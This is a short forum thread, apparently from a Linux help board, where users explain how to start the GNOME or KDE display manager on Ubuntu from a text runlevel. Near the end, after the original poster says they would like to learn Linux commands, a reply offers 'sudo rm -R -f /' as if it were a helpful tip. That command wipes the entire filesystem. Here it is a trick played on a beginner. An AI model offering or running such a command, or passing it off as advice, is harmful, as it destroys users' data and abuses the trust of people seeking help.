sudo /etc/init.d/gdm start
sudo /etc/init.d/kdm start
I take it you either installed kubuntu or have adhoc'd the install of KDE to ubunut ?
normally to get from runlevel 3 to runlevel 5 I would issue the command
Code:sudo /etc/init.d/gdm start
I believe for KDE (havent used KDE for a long time) that the command is
Code:sudo /etc/init.d/kdm start
found out it was actually gnome i installed not kde doh
I'd love to learn linux command etc i will get round to it one day lol
sudo rm -R -f /
and just for reference there is no need for double dash's